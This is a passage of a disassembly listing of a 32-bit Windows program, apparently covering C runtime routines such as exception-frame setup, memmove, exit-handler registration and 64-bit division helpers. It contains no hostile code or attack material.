arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 14h
mov eax, [ebp+arg_4]
and [ebp+var_14], 0
mov ecx, [ebp+arg_0]
mov [ebp+var_C], eax
mov eax, [ebp+arg_C]
mov [ebp+var_10], offset sub_42B530
inc eax
mov [ebp+var_8], ecx
mov [ebp+var_4], eax
mov eax, large fs:0
mov [ebp+var_14], eax
lea eax, [ebp+var_14]
mov large fs:0, eax
push [ebp+arg_10]
push ecx
push [ebp+arg_8]
call sub_431AB0
mov ecx, eax
mov eax, [ebp+var_14]
mov large fs:0, eax
mov eax, ecx
leave
retn
sub_42B4DC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42B530 proc near ; DATA XREF: sub_42B4DC+16�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cld
mov eax, [ebp+arg_4]
push 0
push eax
push dword ptr [eax+10h]
push dword ptr [eax+8]
push 0
push [ebp+arg_8]
push dword ptr [eax+0Ch]
push [ebp+arg_0]
call sub_431290
add esp, 20h
pop ebp
retn
sub_42B530 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42B555 proc near ; CODE XREF: sub_4314DE+27�p
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 34h
push ebx
push esi
push edi
and [ebp+var_28], 0
mov [ebp+var_24], offset sub_42B60B
mov eax, [ebp+arg_10]
mov [ebp+var_20], eax
mov eax, [ebp+arg_4]
mov [ebp+var_1C], eax
mov eax, [ebp+arg_14]
mov [ebp+var_18], eax
mov eax, [ebp+arg_18]
mov [ebp+var_14], eax
and [ebp+var_10], 0
and [ebp+var_C], 0
and [ebp+var_8], 0
and [ebp+var_4], 0
mov [ebp+var_10], offset loc_42B5DD
mov [ebp+var_C], esp
mov [ebp+var_8], ebp
mov eax, large fs:0
mov [ebp+var_28], eax
lea eax, [ebp+var_28]
mov large fs:0, eax
mov [ebp+var_34], 1
mov eax, [ebp+arg_0]
mov [ebp+var_30], eax
mov eax, [ebp+arg_8]
mov [ebp+var_2C], eax
lea eax, [ebp+var_30]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax]
call sub_42E41E
call dword ptr [eax+68h]
pop ecx
pop ecx
and [ebp+var_34], 0
loc_42B5DD: ; DATA XREF: sub_42B555+3C�o
cmp [ebp+var_4], 0
jz short loc_42B5FA
mov ebx, large fs:0
mov eax, [ebx]
mov ebx, [ebp+var_28]
mov [ebx], eax
mov large fs:0, ebx
jmp short loc_42B603
; ---------------------------------------------------------------------------
loc_42B5FA: ; CODE XREF: sub_42B555+8C�j
mov eax, [ebp+var_28]
mov large fs:0, eax
loc_42B603: ; CODE XREF: sub_42B555+A3�j
mov eax, [ebp+var_34]
pop edi
pop esi
pop ebx
leave
retn
sub_42B555 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42B60B proc near ; DATA XREF: sub_42B555+D�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
push edi
cld
mov eax, [ebp+arg_0]
mov eax, [eax+4]
and eax, 66h
test eax, eax
jz short loc_42B62E
mov eax, [ebp+arg_4]
mov dword ptr [eax+24h], 1
push 1
pop eax
jmp short loc_42B67B
; ---------------------------------------------------------------------------
loc_42B62E: ; CODE XREF: sub_42B60B+12�j
push 1
mov eax, [ebp+arg_4]
push dword ptr [eax+14h]
mov eax, [ebp+arg_4]
push dword ptr [eax+10h]
mov eax, [ebp+arg_4]
push dword ptr [eax+8]
push 0
push [ebp+arg_8]
mov eax, [ebp+arg_4]
push dword ptr [eax+0Ch]
push [ebp+arg_0]
call sub_431290
add esp, 20h
mov eax, [ebp+arg_4]
cmp dword ptr [eax+24h], 0
jnz short loc_42B66C
push [ebp+arg_0]
push [ebp+arg_4]
call sub_42B457
loc_42B66C: ; CODE XREF: sub_42B60B+54�j
mov ebx, [ebp+arg_4]
mov esp, [ebx+1Ch]
mov ebp, [ebx+20h]
jmp dword ptr [ebx+18h]
; ---------------------------------------------------------------------------
push 1
pop eax
loc_42B67B: ; CODE XREF: sub_42B60B+21�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_42B60B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42B680 proc near ; CODE XREF: sub_43132B+D2�p
; sub_4314DE+45�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
cmp [ebp+arg_4], 0
push edi
mov edi, [ebp+arg_0]
mov esi, [edi+0Ch]
mov ebx, [edi+10h]
mov eax, esi
mov [ebp+arg_0], esi
mov [ebp+var_4], eax
jl short loc_42B6D7
loc_42B69E: ; CODE XREF: sub_42B680+52�j
cmp esi, 0FFFFFFFFh
jnz short loc_42B6A8
call sub_431B5D
loc_42B6A8: ; CODE XREF: sub_42B680+21�j
mov ecx, [ebp+arg_8]
dec esi
lea eax, [esi+esi*4]
cmp [ebx+eax*4+4], ecx
lea eax, [ebx+eax*4]
jge short loc_42B6BD
cmp ecx, [eax+8]
jle short loc_42B6C2
loc_42B6BD: ; CODE XREF: sub_42B680+36�j
cmp esi, 0FFFFFFFFh
jnz short loc_42B6CE
loc_42B6C2: ; CODE XREF: sub_42B680+3B�j
mov eax, [ebp+arg_0]
dec [ebp+arg_4]
mov [ebp+var_4], eax
mov [ebp+arg_0], esi
loc_42B6CE: ; CODE XREF: sub_42B680+40�j
cmp [ebp+arg_4], 0
jge short loc_42B69E
mov eax, [ebp+var_4]
loc_42B6D7: ; CODE XREF: sub_42B680+1C�j
mov ecx, [ebp+arg_C]
inc esi
mov [ecx], esi
mov ecx, [ebp+arg_10]
mov [ecx], eax
cmp eax, [edi+0Ch]
ja short loc_42B6EB
cmp esi, eax
jbe short loc_42B6F0
loc_42B6EB: ; CODE XREF: sub_42B680+65�j
call sub_431B5D
loc_42B6F0: ; CODE XREF: sub_42B680+69�j
lea eax, [esi+esi*4]
pop edi
pop esi
lea eax, [ebx+eax*4]
pop ebx
leave
retn
sub_42B680 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_42B6FC proc near ; CODE XREF: sub_4154E4+5�p
; sub_419797+5�p ...
push 0FFFFFFFFh
push eax
mov eax, large fs:0
push eax
mov eax, [esp+0Ch]
mov large fs:0, esp
mov [esp+0Ch], ebp
lea ebp, [esp+0Ch]
push eax
retn
sub_42B6FC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42B71B proc near ; CODE XREF: sub_42B799+4�p
arg_0 = dword ptr 4
push esi
call sub_430B2B
push dword_676EB4
call sub_431EE2
mov edx, dword_676EB4
pop ecx
mov ecx, dword_676EB0
mov esi, ecx
sub esi, edx
add esi, 4
cmp eax, esi
jnb short loc_42B781
push edx
call sub_431EE2
add eax, 10h
push eax
push dword_676EB4
call sub_431BB3
add esp, 0Ch
test eax, eax
jnz short loc_42B764
xor esi, esi
jmp short loc_42B790
; ---------------------------------------------------------------------------
loc_42B764: ; CODE XREF: sub_42B71B+43�j
mov ecx, dword_676EB0
sub ecx, dword_676EB4
mov dword_676EB4, eax
sar ecx, 2
lea ecx, [eax+ecx*4]
mov dword_676EB0, ecx
loc_42B781: ; CODE XREF: sub_42B71B+27�j
mov eax, [esp+4+arg_0]
mov [ecx], eax
add dword_676EB0, 4
mov esi, eax
loc_42B790: ; CODE XREF: sub_42B71B+47�j
call sub_430B34
mov eax, esi
pop esi
retn
sub_42B71B endp
; =============== S U B R O U T I N E =======================================
sub_42B799 proc near ; CODE XREF: sub_418CA0+19�p
; sub_42917D+5�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_42B71B
neg eax
sbb eax, eax
pop ecx
neg eax
dec eax
retn
sub_42B799 endp
; =============== S U B R O U T I N E =======================================
sub_42B7AB proc near ; DATA XREF: .text:0043A018�o
push 80h
call sub_4296E8
test eax, eax
pop ecx
mov dword_676EB4, eax
jnz short loc_42B7CC
push 18h
call sub_42C5AC
mov eax, dword_676EB4
pop ecx
loc_42B7CC: ; CODE XREF: sub_42B7AB+12�j
and dword ptr [eax], 0
mov eax, dword_676EB4
mov dword_676EB0, eax
retn
sub_42B7AB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42B7DA proc near ; CODE XREF: sub_4196E3+20�p
; sub_41C41E+20�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push esi
push [ebp+arg_C]
mov [ebp+var_18], eax
mov [ebp+var_20], eax
mov eax, [ebp+arg_4]
push [ebp+arg_8]
mov [ebp+var_1C], eax
lea eax, [ebp+var_20]
mov [ebp+var_14], 42h
push eax
call sub_42DBAD
add esp, 0Ch
dec [ebp+var_1C]
mov esi, eax
js short loc_42B818
mov eax, [ebp+var_20]
and byte ptr [eax], 0
jmp short loc_42B825
; ---------------------------------------------------------------------------
loc_42B818: ; CODE XREF: sub_42B7DA+34�j
lea eax, [ebp+var_20]
push eax
push 0
call sub_42DA95
pop ecx
pop ecx
loc_42B825: ; CODE XREF: sub_42B7DA+3C�j
mov eax, esi
pop esi
leave
retn
sub_42B7DA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42B82A proc near ; CODE XREF: sub_41B12F+54�p
; sub_41B1F6+18�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push esi
push edi
push 8
pop ecx
mov esi, offset dword_437478
lea edi, [ebp+var_20]
rep movsd
mov [ebp+var_8], eax
mov eax, [ebp+arg_4]
mov [ebp+var_4], eax
lea eax, [ebp+var_C]
push eax
push [ebp+var_10]
push [ebp+var_1C]
push [ebp+var_20]
call dword_437230 ; RaiseException
pop edi
pop esi
leave
retn 8
sub_42B82A endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42B870 proc near ; CODE XREF: sub_419A4B+C8�p
; sub_42C63D+93�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov ecx, [ebp+arg_8]
jecxz short loc_42B8A1
mov ebx, ecx
mov edi, [ebp+arg_0]
mov esi, edi
xor eax, eax
repne scasb
neg ecx
add ecx, ebx
mov edi, esi
mov esi, [ebp+arg_4]
repe cmpsb
mov al, [esi-1]
xor ecx, ecx
cmp al, [edi-1]
ja short loc_42B89F
jz short loc_42B8A1
dec ecx
dec ecx
loc_42B89F: ; CODE XREF: sub_42B870+29�j
not ecx
loc_42B8A1: ; CODE XREF: sub_42B870+9�j
; sub_42B870+2B�j
mov eax, ecx
pop ebx
pop esi
pop edi
leave
retn
sub_42B870 endp
; =============== S U B R O U T I N E =======================================
sub_42B8A8 proc near ; DATA XREF: .text:off_43749C�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
call sub_42B94B
test [esp+4+arg_0], 1
jz short loc_42B8BE
push esi
call sub_429006
pop ecx
loc_42B8BE: ; CODE XREF: sub_42B8A8+D�j
mov eax, esi
pop esi
retn 4
sub_42B8A8 endp
; =============== S U B R O U T I N E =======================================
sub_42B8C4 proc near ; CODE XREF: sub_41B189+1F�p
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
mov esi, ecx
mov dword ptr [esi], offset off_43749C
push dword ptr [edi]
call sub_4292D0
inc eax
push eax
call sub_42B407
pop ecx
mov [esi+4], eax
test eax, eax
pop ecx
jz short loc_42B8F3
push dword ptr [edi]
push eax
call sub_42A500
pop ecx
pop ecx
loc_42B8F3: ; CODE XREF: sub_42B8C4+23�j
mov dword ptr [esi+8], 1
mov eax, esi
pop edi
pop esi
retn 4
sub_42B8C4 endp
; =============== S U B R O U T I N E =======================================
sub_42B901 proc near ; CODE XREF: sub_41B26C+17�p
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
mov esi, ecx
mov dword ptr [esi], offset off_43749C
mov eax, [edi+8]
test eax, eax
mov [esi+8], eax
jz short loc_42B93E
push dword ptr [edi+4]
call sub_4292D0
inc eax
push eax
call sub_42B407
pop ecx
mov [esi+4], eax
test eax, eax
pop ecx
jz short loc_42B944
push dword ptr [edi+4]
push eax
call sub_42A500
pop ecx
pop ecx
jmp short loc_42B944
; ---------------------------------------------------------------------------
loc_42B93E: ; CODE XREF: sub_42B901+16�j
mov eax, [edi+4]
mov [esi+4], eax
loc_42B944: ; CODE XREF: sub_42B901+2E�j
; sub_42B901+3B�j
mov eax, esi
pop edi
pop esi
retn 4
sub_42B901 endp
; =============== S U B R O U T I N E =======================================
sub_42B94B proc near ; CODE XREF: sub_41B213+2B�p
; sub_41B2C4+2B�p ...
cmp dword ptr [ecx+8], 0
mov dword ptr [ecx], offset off_43749C
jz short locret_42B960
push dword ptr [ecx+4]
call sub_429006
pop ecx
locret_42B960: ; CODE XREF: sub_42B94B+A�j
retn
sub_42B94B endp
; =============== S U B R O U T I N E =======================================
sub_42B961 proc near ; DATA XREF: .text:004374A0�o
mov eax, [ecx+4]
test eax, eax
jnz short locret_42B96D
mov eax, offset aUnknownExcepti ; "Unknown exception"
locret_42B96D: ; CODE XREF: sub_42B961+5�j
retn
sub_42B961 endp
; =============== S U B R O U T I N E =======================================
sub_42B96E proc near ; CODE XREF: .text:0042B99A�p
push esi
mov esi, ecx
push 1Bh
mov dword ptr [esi], offset off_4374BC
call sub_42DA1F
mov esi, [esi+4]
pop ecx
test esi, esi
jz short loc_42B98D
push esi
call sub_429822
pop ecx
loc_42B98D: ; CODE XREF: sub_42B96E+16�j
push 1Bh
call sub_42DA80
pop ecx
pop esi
retn
sub_42B96E endp
; ---------------------------------------------------------------------------
loc_42B997: ; DATA XREF: .text:off_4374BC�o
push esi
mov esi, ecx
call sub_42B96E
test byte ptr [esp+8], 1
jz short loc_42B9AD
push esi
call sub_429006
pop ecx
loc_42B9AD: ; CODE XREF: .text:0042B9A4�j
mov eax, esi
pop esi
retn 4
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42B9C0 proc near ; CODE XREF: sub_41B494+3A�p
; sub_42C855+2EF�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_42B9E0
cmp edi, eax
jb loc_42BB58
loc_42B9E0: ; CODE XREF: sub_42B9C0+16�j
test edi, 3
jnz short loc_42B9FC
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_42BA1C
rep movsd
jmp off_42BB08[edx*4]
; ---------------------------------------------------------------------------
loc_42B9FC: ; CODE XREF: sub_42B9C0+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_42BA14
and eax, 3
add ecx, eax
jmp dword ptr loc_42BA1C+4[eax*4]
; ---------------------------------------------------------------------------
loc_42BA14: ; CODE XREF: sub_42B9C0+46�j
jmp dword ptr loc_42BB18[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_42BA1C: ; CODE XREF: sub_42B9C0+31�j
; sub_42B9C0+8E�j ...
jmp off_42BA9C[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_42BA2C+4
dd offset loc_42BA5C
; ---------------------------------------------------------------------------
loc_42BA2C: ; DATA XREF: sub_42B9C0+64�o
cmp byte ptr [edx-2EDCFFBEh], 8Ah
push es
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_42BA1C
rep movsd
jmp off_42BB08[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_42BA5C: ; DATA XREF: sub_42B9C0+68�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_42BA1C
rep movsd
jmp off_42BB08[edx*4]
; ---------------------------------------------------------------------------
align 10h
and edx, ecx
mov al, [esi]
mov [edi], al
inc esi
shr ecx, 2
inc edi
cmp ecx, 8
jb short loc_42BA1C
rep movsd
jmp off_42BB08[edx*4]
; ---------------------------------------------------------------------------
align 4
off_42BA9C dd offset loc_42BAFF ; DATA XREF: sub_42B9C0:loc_42BA1C�r
dd offset loc_42BAEC
dd offset loc_42BAE4
dd offset loc_42BADC
dd offset loc_42BAD4
dd offset loc_42BACC
dd offset loc_42BAC4
dd offset loc_42BABC
; ---------------------------------------------------------------------------
loc_42BABC: ; CODE XREF: sub_42B9C0:loc_42BA1C�j
; DATA XREF: sub_42B9C0+F8�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_42BAC4: ; CODE XREF: sub_42B9C0:loc_42BA1C�j
; DATA XREF: sub_42B9C0+F4�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_42BACC: ; CODE XREF: sub_42B9C0:loc_42BA1C�j
; DATA XREF: sub_42B9C0+F0�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_42BAD4: ; CODE XREF: sub_42B9C0:loc_42BA1C�j
; DATA XREF: sub_42B9C0+EC�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_42BADC: ; CODE XREF: sub_42B9C0:loc_42BA1C�j
; DATA XREF: sub_42B9C0+E8�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_42BAE4: ; CODE XREF: sub_42B9C0:loc_42BA1C�j
; DATA XREF: sub_42B9C0+E4�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_42BAEC: ; CODE XREF: sub_42B9C0:loc_42BA1C�j
; DATA XREF: sub_42B9C0+E0�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_42BAFF: ; CODE XREF: sub_42B9C0:loc_42BA1C�j
; DATA XREF: sub_42B9C0:off_42BA9C�o
jmp off_42BB08[edx*4]
; ---------------------------------------------------------------------------
align 4
off_42BB08 dd offset loc_42BB18 ; DATA XREF: sub_42B9C0+35�r
; sub_42B9C0+92�r ...
dd offset loc_42BB20
dd offset loc_42BB2C
dd offset loc_42BB40
; ---------------------------------------------------------------------------
loc_42BB18: ; CODE XREF: sub_42B9C0+35�j
; sub_42B9C0+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_42BB20: ; CODE XREF: sub_42B9C0+35�j
; sub_42B9C0+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_42BB2C: ; CODE XREF: sub_42B9C0+35�j
; sub_42B9C0+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_42BB40: ; CODE XREF: sub_42B9C0+35�j
; sub_42B9C0+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_42BB58: ; CODE XREF: sub_42B9C0+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_42BB8C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_42BB80
std
rep movsd
cld
jmp off_42BCA0[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_42BB80: ; CODE XREF: sub_42B9C0+1B1�j
; sub_42B9C0+208�j ...
neg ecx
jmp off_42BC50[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_42BB8C: ; CODE XREF: sub_42B9C0+1A6�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_42BBA4
and eax, 3
sub ecx, eax
jmp dword ptr loc_42BBA4+4[eax*4]
; ---------------------------------------------------------------------------
loc_42BBA4: ; CODE XREF: sub_42B9C0+1D6�j
; DATA XREF: sub_42B9C0+1DD�r
jmp off_42BCA0[ecx*4]
; ---------------------------------------------------------------------------
align 4
mov eax, 0D80042BBh
mov ebx, 0BC000042h
inc edx
add [edx-2EDCFCBAh], cl
mov [edi+3], al
dec esi
shr ecx, 2
dec edi
cmp ecx, 8
jb short loc_42BB80
std
rep movsd
cld
jmp off_42BCA0[edx*4]
; ---------------------------------------------------------------------------
align 4
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_42BB80
std
rep movsd
cld
jmp off_42BCA0[edx*4]
; ---------------------------------------------------------------------------
align 10h
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_42BB80
std
rep movsd
cld
jmp off_42BCA0[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_42BC54
dd offset loc_42BC5C
dd offset loc_42BC64
dd offset loc_42BC6C
dd offset loc_42BC74
dd offset loc_42BC7C
dd offset loc_42BC84
off_42BC50 dd offset loc_42BC97 ; DATA XREF: sub_42B9C0+1C2�r
; ---------------------------------------------------------------------------
loc_42BC54: ; DATA XREF: sub_42B9C0+274�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_42BC5C: ; DATA XREF: sub_42B9C0+278�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_42BC64: ; DATA XREF: sub_42B9C0+27C�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_42BC6C: ; DATA XREF: sub_42B9C0+280�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_42BC74: ; DATA XREF: sub_42B9C0+284�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_42BC7C: ; DATA XREF: sub_42B9C0+288�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_42BC84: ; DATA XREF: sub_42B9C0+28C�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_42BC97: ; CODE XREF: sub_42B9C0+1C2�j
; DATA XREF: sub_42B9C0:off_42BC50�o
jmp off_42BCA0[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_42BCA0 dd offset loc_42BCB0 ; DATA XREF: sub_42B9C0+1B7�r
; sub_42B9C0:loc_42BBA4�r ...
dd offset loc_42BCB8
dd offset loc_42BCC8
dd offset loc_42BCDC
; ---------------------------------------------------------------------------
loc_42BCB0: ; CODE XREF: sub_42B9C0+1B7�j
; sub_42B9C0:loc_42BBA4�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_42BCB8: ; CODE XREF: sub_42B9C0+1B7�j
; sub_42B9C0:loc_42BBA4�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_42BCC8: ; CODE XREF: sub_42B9C0+1B7�j
; sub_42B9C0:loc_42BBA4�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_42BCDC: ; CODE XREF: sub_42B9C0+1B7�j
; sub_42B9C0:loc_42BBA4�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_42B9C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_42BD00 proc near ; CODE XREF: sub_41BC85+3D�p
; sub_427D86+2D�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
mov eax, [esp+4+arg_C]
or eax, eax
jnz short loc_42BD21
mov ecx, [esp+4+arg_8]
mov eax, [esp+4+arg_4]
xor edx, edx
div ecx
mov eax, [esp+4+arg_0]
div ecx
mov eax, edx
xor edx, edx
jmp short loc_42BD71
; ---------------------------------------------------------------------------
loc_42BD21: ; CODE XREF: sub_42BD00+7�j
mov ecx, eax
mov ebx, [esp+4+arg_8]
mov edx, [esp+4+arg_4]
mov eax, [esp+4+arg_0]
loc_42BD2F: ; CODE XREF: sub_42BD00+39�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_42BD2F
div ebx
mov ecx, eax
mul [esp+4+arg_C]
xchg eax, ecx
mul [esp+4+arg_8]
add edx, ecx
jb short loc_42BD5A
cmp edx, [esp+4+arg_4]
ja short loc_42BD5A
jb short loc_42BD62
cmp eax, [esp+4+arg_0]
jbe short loc_42BD62
loc_42BD5A: ; CODE XREF: sub_42BD00+4A�j
; sub_42BD00+50�j
sub eax, [esp+4+arg_8]
sbb edx, [esp+4+arg_C]
loc_42BD62: ; CODE XREF: sub_42BD00+52�j
; sub_42BD00+58�j
sub eax, [esp+4+arg_0]
sbb edx, [esp+4+arg_4]
neg edx
neg eax
sbb edx, 0
loc_42BD71: ; CODE XREF: sub_42BD00+1F�j
pop ebx
retn 10h
sub_42BD00 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_42BD80 proc near ; CODE XREF: sub_41BC85+24�p
; sub_427D86+3F�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
mov eax, [esp+8+arg_C]
or eax, eax
jnz short loc_42BDA2
mov ecx, [esp+8+arg_8]
mov eax, [esp+8+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+8+arg_0]
div ecx
mov edx, ebx
jmp short loc_42BDE3
; ---------------------------------------------------------------------------
loc_42BDA2: ; CODE XREF: sub_42BD80+8�j
mov ecx, eax
mov ebx, [esp+8+arg_8]
mov edx, [esp+8+arg_4]
mov eax, [esp+8+arg_0]
loc_42BDB0: ; CODE XREF: sub_42BD80+3A�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_42BDB0
div ebx
mov esi, eax
mul [esp+8+arg_C]
mov ecx, eax
mov eax, [esp+8+arg_8]
mul esi
add edx, ecx
jb short loc_42BDDE
cmp edx, [esp+8+arg_4]
ja short loc_42BDDE
jb short loc_42BDDF
cmp eax, [esp+8+arg_0]
jbe short loc_42BDDF
loc_42BDDE: ; CODE XREF: sub_42BD80+4E�j
; sub_42BD80+54�j
dec esi
loc_42BDDF: ; CODE XREF: sub_42BD80+56�j
; sub_42BD80+5C�j
xor edx, edx
mov eax, esi
loc_42BDE3: ; CODE XREF: sub_42BD80+20�j
pop esi
pop ebx
retn 10h
sub_42BD80 endp
; =============== S U B R O U T I N E =======================================
sub_42BDE8 proc near ; CODE XREF: sub_41EBD7+14C�p
; sub_41EBD7+15E�p
arg_0 = dword ptr 4
arg_4 = byte ptr 8
push ebx
push esi
mov esi, offset dword_450EC0
push edi
push esi
push 1
call sub_42C133
push esi
call sub_432034
mov edi, eax
lea eax, [esp+18h+arg_4]
push eax
push [esp+1Ch+arg_0]
push esi
call sub_42DBAD
push esi
push edi
mov ebx, eax
call sub_4320C1
push esi
push 1
call sub_42C185
add esp, 28h
mov eax, ebx
pop edi
pop esi
pop ebx
retn
sub_42BDE8 endp
; =============== S U B R O U T I N E =======================================
sub_42BE29 proc near ; CODE XREF: sub_41EBD7+12B�p
arg_0 = dword ptr 4
push esi
push edi
push 2
pop edi
push edi
call sub_43234B
mov esi, [esp+0Ch+arg_0]
pop ecx
test esi, esi
jz short loc_42BE5F
cmp byte ptr [esi], 0
jz short loc_42BE5F
push esi
call sub_4292D0
push eax
push esi
push edi
